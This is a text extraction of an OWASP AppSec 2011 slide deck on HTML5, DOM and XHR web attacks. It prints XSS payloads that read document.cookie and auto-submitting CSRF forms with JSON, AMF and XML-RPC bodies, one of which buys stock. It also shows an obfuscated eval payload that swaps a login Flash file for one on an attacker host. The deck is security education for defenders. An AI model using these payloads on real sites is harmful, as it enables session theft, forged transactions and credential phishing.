SlideShare a Scribd company logo
Next Generation Web Attacks –
               HTML 5, DOM(L3) and XHR(L2)



                             Shreeraj Shah
                             Blueinfy Solutions Pvt. Ltd.
                             shreeraj.shah@blueinfy.net

OWASP
22nd Sept. 2011
OWASP AppSec USA 2011
                        Copyright © The OWASP Foundation
                        Permission is granted to copy, distribute and/or modify this document
                        under the terms of the OWASP License.




                        The OWASP Foundation
                        http://www.owasp.org
http://shreeraj.blogspot.com
                                                    shreeraj@blueinfy.com
    Who Am I?                                       http://www.blueinfy.com


Founder & Director
   Blueinfy Solutions Pvt. Ltd.
   SecurityExposure.com
Past experience
   Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM
   (Domino Dev)
Interest
   Web security research
Published research
   Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
   Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
   Advisories - .Net, Java servers etc.
   Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan,
   DeepSec etc.
Books (Author)
   Web 2.0 Security – Defending Ajax, RIA and SOA
   Hacking Web Services
   Web Hacking


                                                                   OWASP
                                   2
Agenda

 Next Generation Application’s Attack Surface and
 Threat Model
 HTML 5 – Tags, Storage & WebSQL
 DOM – Vulnerabilities & Exploits
 Abusing Sockets, XHR & CSRF
 ClickJacking & Exploting Rich HTML Components
 Reverse Engineering across DOM




                                         OWASP
                       3
ATTACK SURFACE AND
THREAT MODEL
                     OWASP
           4
Real Life Cases

 Last three years – several application reviewed
 (Banking, Trading, Portals, Web 2.0 sites etc…)
 Interesting outcomes and stats
 Auto scanning is becoming increasingly difficult
 and impossible in some cases
 Sites are vulnerable and easily exploitable in
 many cases




                                          OWASP
                       5
Technology Shift & Trend
                                                                 • Android
                                                          • iPhone/Pad
                                                       • HTML 5 Other
                                                                •
                                                          • Storage   • Flash
                                                                  Mobile      • AMF
                                                  • WebSocket
                                                                 • DOM
                                                 • WebSQL
                                                                   • JS • Storage• Flex
                                                  • XHR                   • XAML
Server side
Components                                                  • Silverlight • WCF

                  Presentation Layer                              • NET

                    Business Layer
                                             Client side
                   Data Access Layer         Components
                      Authentication         (Browser)
                    Communication etc.


    Runtime, Platform, Operating System Components
                                                                      OWASP
                                         6
Browser Model
                                                                         Mobile



         HTML5               Silverlight              Flash
                                           Plug-In
                                                                       Presentation


        JavaScript          DOM/Events          Parser/Threads
                                                                  Process & Logic
          WebSQL                                     Storage


           XHR               WebSocket          Plug-in Sockets
                   Browser Native Network Services                        Network
                                                                          & Access


       Same Origin Policy (SOP)                Sandbox                      Core
                                                                            Policies

                                                                  OWASP             7
                                  7
Layers
  Presentation
    HTML5
    Silverlight
    Flash/Flex
  Process & Logic
    JavaScript, Document Object Model (DOM - 3), Events,
    Parsers/Threads etc.
  Network & Access
    XHR – Level 2
    WebSockets
    Plugin-Sockets
  Core Policies
    SOP
    Sandboxing for iframe
    Shared Resources

                                                     OWASP
                             8
Application Architecture



                                                          Trading   Weather
        Ajax
                                                                                       Email
     RIA (Flash)                              Banking
   HTML / JS / DOM
                     End Client
       Browser                                                                                  Blog
        Stack



                                  Internet                          Internet


                                                                         Web Services



                                             Web Server
                                                                         Data-access

                                                   Application Server
                                                                                                 Database
                                                                         Auth. Access



                                                                                               Authentication
                                                                                                  Server



                                                                                                       OWASP
                                               9
Attack Surface Expansion

                                   JSON/XML
                                   streams
                                                               POST name
              HTTP Response
                                                               and value pairs
              variables
                                                                                 XML/JSON
                                                    QueryString                  etc.
                           Ajax
                        RIA (Flash)                                                   HTTP variables
                                                                                      Cookie etc.
DOM calls/events     HTML / JS / DOM


                                                                                         File attachments
                                                                                         uploads etc.
                   API - streams

                                                   Open APIs and             Feeds and other
                                                   integrated streams        party information




                                                                                          OWASP             1
                                              10
                                                                                                            0
AppSec dynamics




Source - OWASP
                          OWASP   11
                     11
Integration and Communications

DOM glues everything – It integrates Flex,
Silverlight and HTML if needed
Various ways to communicate – native browser
way, using XHR and WebSockets
Options for data sharing – JSON, XML, WCF,
AMF etc. (many more)
Browsers are supporting new set of technologies
and exposing the surface



                                       OWASP
                     12
Demos

 App using DOM, AJAX and Web Services
 HTML 5 components and usage
 Fingerprinting Application Assets from DOM or
 JavaScripts
 Frameworks, Scripts, Structures, and so on –
 DWR/Struts




                                        OWASP
                      13
Threat Model

            Sandbox attacks 7                    1   XSS abuse with                    8     Abusing new features
            and ClickJacking                         tags and attributes                     like drag-and-drop



                             Events         Tags & Attributes          Thick Features
                                                                                                  Presentation

         Injecting and
         Exploiting WebSQL         WebSQL
                                                       DOM                         Storage

           4                                                                                 3
                                                                                            Stealing from
                                             2   DOM based XSS                              the storage
                     Parser/Threads                                             Process & Logic
                                                 and Redirects

     5
                             XHR              WebSocket             Plug-in Sockets
Abusing network                                                                                  Network
API and Sockets                    Browser Native Network Services                               & Access


 CSRF       6                                                                                    Core
 across streams
                        Same Origin Policy (SOP)                  Sandbox                        Policies

 9                                                                      Threats to widgets
  Botnet/Spynet using                                             10                               OWASP
  WebWorkers                                           14               and mashups
Mapping top 10 – Current Context
  A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL.
  A2 – XSS : DOM based XSS, Script injection through , Direct third party streams,
  HTML5 tags
  A3 – Broken Authentication and Session Management: Reverse Engineering
  Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage
  A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from
  browser.
  A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing)
  A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model
  A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from
  reverse engineering
  A8 – Unvalidated Redirects : DOM-based redirects and spoofing
  A9 – Insecure Crypto Storage : Local storage inside browser and Global variables
  A10 – Insufficient Transport Layer Protection : Ajax and other calls going over
  non-SSL channels.
  Mobile 10 …



                                                                       OWASP
                                      15
HTML 5 – TAGS, STORAGE &
WEBSQL
                     OWASP   1
           16
                             6
Abusing HTML 5 Tags

  Various new tags and can be abused, may not
  be filtered or validated

  Media tags
<video poster=javascript:alert(document.cookie)//
<audio><source onerror="javascript:alert(document.cookie)">


  Form tags
<form><button formaction="javascript:alert(document.cookie)">foo
<body oninput=alert(document.cookie)><input autofocus>


                                                       OWASP
                               17
Attacking Storage

 HTML 5 is having local storage and can hold
 global scoped variables
 http://www.w3.org/TR/webstorage/




                                        OWASP
                      18
Attacking Storage

 It is possible to steal them through XSS or via
 JavaScript
 getItem and setItem calls




 XSS the box and scan through storage




                                          OWASP
                       19
DOM Storage

 Applications run with “rich” DOM
 JavaScript sets several variables and parameters
 while loading – GLOBALS
 It has sensitive information and what if they are
 GLOBAL and remains during the life of
 application
 It can be retrieved with XSS
 HTTP request and response are going through
 JavaScripts (XHR) – what about those vars?

                                          OWASP
                       20
What is wrong?




                      OWASP
                 21
By default its Global

  Here is the line of code

    temp = "login.do?user="+user+"&pwd="+pwd;
     xmlhttp.open("GET",temp,true);
     xmlhttp.onreadystatechange=function()




                                         OWASP
                        22
DOM stealing

 It is possible to get these variables and clear
 text information – user/pass
 Responses and tokens
 Business information
 XHR calls and HTTP request/responses
 Dummy XHR object injection
 Lot of possibilities for exploitation




                                           OWASP
                        23
Demo

 DOMTracer and profiling
 Accessing username and password




                                   OWASP
                    24
SQL Injection

 WebSQL is part of HTML 5 specification, it
 provides SQL database to the browser itself.
 Allows one time data loading and offline
 browsing capabilities.
 Causes security concern and potential injection
 points.
 Methods and calls are possible




                                         OWASP
                       25
SQL Injection

 Through JavaScript one can harvest entire local
 database.
 Example




                                         OWASP
                      26
DOM – VULNERABILITIES &
EXPLOITS
                    OWASP
           27
DOM Architecture




                        OWASP
                   28
DOM Calls

 Ajax/Flash/Silverlight – Async Calls



     HTML / CSS / RIA                 Database / Resource


         JS / DOM                   XML / Middleware / Text


   XMLHttpRequest (XHR)                   Web Server



                Asynchronous
                over HTTP(S)


                                                            OWASP
                               29
DOM Calls

                            JSON




                XML                JS-Script




                                     JS-Object
            JS-Array




                                      OWASP
                       30
DOM based XSS

 It is a sleeping giant in the Ajax applications
 Root cause
   DOM is already loaded
   Application is single page and DOM remains same
   New information coming needs to be injected in using
   various DOM calls like eval()
   Information is coming from untrusted sources




                                              OWASP
                         31
Example cases

 Various different way DOM based XSS can take
 place
 Example
   Simple DOM function using URL to process ajax calls
   Third party content going into existing DOM and call
   is not secure
   Ajax call from application, what if we make a direct
   call to the link – JSON may cause XSS




                                               OWASP
                         32
DOM based URL parsing

 Ajax applications are already loaded and
 developers may be using static function to pass
 arguments from URL
 For example
   hu = window.location.search.substring(1);
   Above parameter is going to following ajax function
      eval('getProduct('+ koko.toString()+')');
   DOM based XSS




                                                  OWASP
                              33
Demo

 Scanning with DOMScan
 Injecting payload in the call




                                 OWASP
                        34
Third Party Streaming

                                            Documents

    Attacker
                                    News                        Weather

                               Mails                                    Bank/Trade
              Browser                           Internet
                                                                            RSS feeds
      Ajax
RIA (Flash/Silver)      Internet                App
HTML / JS / DOM

                        Blog                    Database   Authentication
    Stream
                                                      Application
                                                      Infrastructure
     eval()                        Web Services
                                   End point
      XSS
                                                                                        OWASP
                                           35
Stream processing


    if (http.readyState == 4) {
            var response = http.responseText;
             var p = eval("(" + response + ")");
            document.open();
            document.write(p.firstName+"<br>");
            document.write(p.lastName+"<br>");
            document.write(p.phoneNumbers[0]);
            document.close();




                                                   OWASP
                                 36
Polluting Streams


                           XML/ JS-Object / JS-Array / JS-Script / JSON
       attacker
8008




                                                proxy

                                               Web app
                                                                 DB
                                 Web
                                Server         Web app
                                                                 DB
                                               Web app


                  Stream
Web
Client
                  eval()


                   XSS                                    OWASP
                           37
Exploiting DOM calls

  document.write(…)
  document.writeln(…)
  document.body.innerHtml=…
  document.forms[0].action=…          Example of vulnerable
  document.attachEvent(…)             Calls
  document.create…(…)
  document.execCommand(…)
  document.body. …
  window.attachEvent(…)
  document.location=…
  document.location.hostname=…
  document.location.replace(…)
  document.location.assign(…)
  document.URL=…
  window.navigate(…)
                                             OWASP
                                 38
Demo

 Sample call demo
 DOMScan to identify vulnerability




                                     OWASP
                       39
Direct Ajax Call

 Ajax function would be making a back-end call
 Back-end would be returning JSON stream or
 any other and get injected in DOM
 In some libraries their content type would allow
 them to get loaded in browser directly
 In that case bypassing DOM processing…




                                          OWASP
                       40
Demo

 DWR/JSON call – bypassing and direct stream
 access




                                       OWASP
                     41
ABUSING SOCKETS, XHR &
CSRF
                    OWASP
           42
Abusing network calls

 HTML 5 provides WebSocket and XHR Level 2
 calls
 It allows to make cross domains call and raw
 socket capabilities
 It can be leveraged by JavaScript payload
 Malware or worm can use it to perform several
 scanning tasks




                                        OWASP
                      43
Internal Scanning

 Allows internal scanning, setting backward
 hidden channel, opening calls to proxy/cache.
 Some browsers have blocked these calls for
 security reason.




                                         OWASP
                      44
XHR/CSRF ETC.


                OWASP
           45
XHR – Level 2 calls
  XHR is now level 2 on browser
  Various browser behavior is different
  XHR is already implemented
  Shared resource policy implemented
  “orgin” and “access-*” tags and decisions based
  on that
  Potential abuses
     One way stealth channel
     CSRF possible (no cookie though)
     Header changes
  CROS - http://www.w3.org/TR/cors/ (Cross Origin
  Request Sharing)
                                            OWASP
                           46
CSRF

 CSRF is possible with Web 2.0 streams by
 abusing DOM calls
   XML manipulations
   CSRF with JSON
   AMX is also XML stream
 Attacker injects simple HTML payload
 Initiate a request from browser to target cross
 domain



                                          OWASP
                        47
How it works?




                     OWASP
                48
JSON

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
  action="http://192.168.100.101/json/jservice.ashx"
  METHOD="POST">
     <input type="hidden"
  name='{"id":3,"method":"getProduct","params":{ "id" : 3}}'
  value='foo'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>



                                                         OWASP
                                49
HTTP Req.

POST /json/jservice.ashx HTTP/1.1
Host: 192.168.100.2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3)
   Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: text/plain
Content-Length: 57

{"id":3,"method":"getProduct","params":{ "id" : 3}}=foo


                                                               OWASP
                                    50
HTTP Resp.

HTTP/1.1 200 OK
Date: Sat, 17 Jul 2010 09:14:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 1135
{"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image
      _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the
      Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political
      landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about
      him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he
      cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik
      General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic,
      sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that
      followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}}


                                                                                                                    OWASP
                                                                  51
AMF

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
   action="http://192.168.100.101:8080/samples/messagebroker/http"
   METHOD="POST">
     <input type="hidden" name='<amfx ver' value='"3"
   xmlns="http://www.macromedia.com/2005/amfx"><body><object
   type="flex.messaging.messages.CommandMessage"><traits><string>body</string
   ><string>clientId</string><string>correlationId</string><string>destination</strin
   g><string>headers</string><string>messageId</string><string>operation</string
   ><string>timestamp</string><string>timeToLive</string></traits><object><traits
   /></object><null/><string/><string/><object><traits><string>DSId</string><str
   ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje
   ct><string>68AFD7CE-BFE2-4881-E6FD-
   694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body>
   </amfx>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>                                                               OWASP
                                        52
XML

 <html>
 <body>
 <FORM NAME="buy" ENCTYPE="text/plain"
 action="http://trade.example.com/xmlrpc/trade.rem"
 METHOD="POST">
      <input type="hidden" name='<?xml version'
 value='"1.0"?><methodCall><methodName>stocks.buy</methodN
 ame><params><param><value><string>MSFT</string></value>
 </param><param><value><double>26</double></value></para
 m></params></methodCall>'>
 </FORM>
 <script>document.buy.submit();</script>
 </body>
 </html>




                                                OWASP
                          53
Demos

 Simple trade demo – XML-RPC call CSRF.




                                      OWASP
                     54
FLASHJACKING


               OWASP
          55
Flashjacking
  It is possible to have some integrated attacks
    DOM based XSS
    CSRF
    Flash
  DOM based issue can change flash/swf file – it
  can be changed at run time – user will not
  come to know ..
  Example
    document.getElementsByName(“login").item(0).src
    = "http://evil/login.swf"


                                           OWASP
                        56
Double eval – eval the eval
  Payload -
  document.getElementsByName('Login').item(0
  ).src='http://192.168.100.200:8080/flex/Login
  n/Loginn.swf‘
  Converting for double eval to inject ‘ and “
  etc…
     eval(String.fromCharCode(100,111,99,117,109,101,110,116,4
     6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97
     ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10
     9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49
     ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4
     7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103
     ,105,110,110,46,115,119,102,39))

                                                      OWASP
                             57
silvelightjacking
  It is possible to have some integrated attacks
     DOM based XSS
     CSRF
     Silvelight files
  DOM based issue can change xap file – it can
  be changed at run time – user will not come to
  know ..
  Example
     document.getElementsByName(“login").item(0).src
     = "http://evil/login.xap"


                                            OWASP
                         58
RICH HTML COMPONENTS


                   OWASP
          59
Widgets

 Widgets/Gadgets/Modules – popular with Web
 2.0 applications
 Small programs runs under browser
 JavaScript and HTML based components
 In some cases they share same DOM – Yes,
 same DOM
 It can cause a cross widget channels
 Exploitable …


                                     OWASP
                     60
Cross DOM Access




   Widget 1         Widget 2         Widget 3
  Email Widget   RSS Feed Reader     Attacker




                 DOM – Shared DOM

                  Setting the trap




                                            OWASP
                          61
DOM traps

 It is possible to access DOM events, variables,
 logic etc.
 Sandbox is required at the architecture layer to
 protect cross widget access
 Segregating DOM by iframe may help
 Flash based widget is having its own issues as
 well
 Code analysis of widgets before allowing them
 to load

                                          OWASP
                       62
Demo

 Cross Widget Spying
 Using DOMScan to review Widget Architecture
 and Access Mechanism
 RSS Feed Hacking
 Mashup Hacks
 Cross Domain Callback Hacking




                                      OWASP
                     63
DEFENDING APPLICATIONS


                    OWASP
           64
Security at CODE Level
  JS, Flash or XAP should not have server side
  logic – should be presentation layer only …
  Obfuscation may help a bit – not full proof.
  Source code and object code analysis during
  blackbox testing would require
  Resource discoveries and fuzzing – a must for
  SOAP, JSON and AMF streams
  Careful with HTML 5 implementation
  DOM based scanning and analysis is required
  Cross streams and third party analytics
                                         OWASP
                      65
http://shreeraj.blogspot.com
                 shreeraj@blueinfy.com
                 http://www.blueinfy.com




CONCLUSION AND
QUESTIONS
                                OWASP
          66

More Related Content

What's hot

Migrating the media supply chain to the AWS cloud
Migrating the media supply chain to the AWS cloud Migrating the media supply chain to the AWS cloud
Migrating the media supply chain to the AWS cloud
Amazon Web Services
 
Apache Jackrabbit Oak - Scale your content repository to the cloud
Apache Jackrabbit Oak - Scale your content repository to the cloudApache Jackrabbit Oak - Scale your content repository to the cloud
Apache Jackrabbit Oak - Scale your content repository to the cloud
Robert Munteanu
 
Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games
Amazon Web Services
 
OpenID Connect: An Overview
OpenID Connect: An OverviewOpenID Connect: An Overview
OpenID Connect: An Overview
Pat Patterson
 
Continuous delivery and deployment on AWS
Continuous delivery and deployment on AWSContinuous delivery and deployment on AWS
Continuous delivery and deployment on AWS
Shiva Narayanaswamy
 
Spring GraphQL
Spring GraphQLSpring GraphQL
Spring GraphQL
VMware Tanzu
 
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech TalksHow to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
Amazon Web Services
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
Amazon Web Services
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018Amazon Web Services Korea
 
Building Mobile Apps with AWS Amplify
Building Mobile Apps with AWS AmplifyBuilding Mobile Apps with AWS Amplify
Building Mobile Apps with AWS Amplify
Amazon Web Services
 
Building Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API GatewayBuilding Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API Gateway
Amazon Web Services
 
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
Amazon Web Services Korea
 
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon Web Services Korea
 
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive 20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
Amazon Web Services Japan
 
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
Amazon Web Services
 
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Bernd Ruecker
 
Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
Amazon Web Services
 
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Web Services
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
Muhammed YALÇIN
 
Network Security and Access Control in AWS
Network Security and Access Control in AWSNetwork Security and Access Control in AWS
Network Security and Access Control in AWS
Amazon Web Services
 

What's hot (20)

Migrating the media supply chain to the AWS cloud
Migrating the media supply chain to the AWS cloud Migrating the media supply chain to the AWS cloud
Migrating the media supply chain to the AWS cloud
 
Apache Jackrabbit Oak - Scale your content repository to the cloud
Apache Jackrabbit Oak - Scale your content repository to the cloudApache Jackrabbit Oak - Scale your content repository to the cloud
Apache Jackrabbit Oak - Scale your content repository to the cloud
 
Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games Build and Deploy Your Mobile Games
Build and Deploy Your Mobile Games
 
OpenID Connect: An Overview
OpenID Connect: An OverviewOpenID Connect: An Overview
OpenID Connect: An Overview
 
Continuous delivery and deployment on AWS
Continuous delivery and deployment on AWSContinuous delivery and deployment on AWS
Continuous delivery and deployment on AWS
 
Spring GraphQL
Spring GraphQLSpring GraphQL
Spring GraphQL
 
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech TalksHow to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
How to use AWS WAF to Mitigate OWASP Top 10 attacks - AWS Online Tech Talks
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
 
Building Mobile Apps with AWS Amplify
Building Mobile Apps with AWS AmplifyBuilding Mobile Apps with AWS Amplify
Building Mobile Apps with AWS Amplify
 
Building Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API GatewayBuilding Serverless Backends with AWS Lambda and Amazon API Gateway
Building Serverless Backends with AWS Lambda and Amazon API Gateway
 
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
[AWS Dev Day] 이머징 테크 | AWS 서버리스를 이용하여 IoT 수준의 메세지 폭풍을 처리하는 방법 - 김민성 AWS 솔루션즈 ...
 
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
Amazon VPC와 ELB/Direct Connect/VPN 알아보기 - 김세준, AWS 솔루션즈 아키텍트
 
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive 20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
20191030 AWS Black Belt Online Seminar AWS IoT Analytics Deep Dive
 
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
How GumGum Migrated from Cassandra to Amazon DynamoDB (DAT345) - AWS re:Inven...
 
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
Monitoring and Orchestration of your Microservices Landscape with Kafka and Z...
 
Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWS
 
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
Amazon Virtual Private Cloud (VPC) - Networking Fundamentals and Connectivity...
 
AWS Lambda
AWS LambdaAWS Lambda
AWS Lambda
 
Network Security and Access Control in AWS
Network Security and Access Control in AWSNetwork Security and Access Control in AWS
Network Security and Access Control in AWS
 

Viewers also liked

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
Anuradha Bandara
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
Valeri Karpov
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
Kai Koenig
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
Kim Hunmin
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
Ynon Perek
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
tharaa abu ashour
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
Anil Singh
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
Simon Guest
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
Nir Kaufman
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
FITC
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
Kyle Hodgson
 

Viewers also liked (12)

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
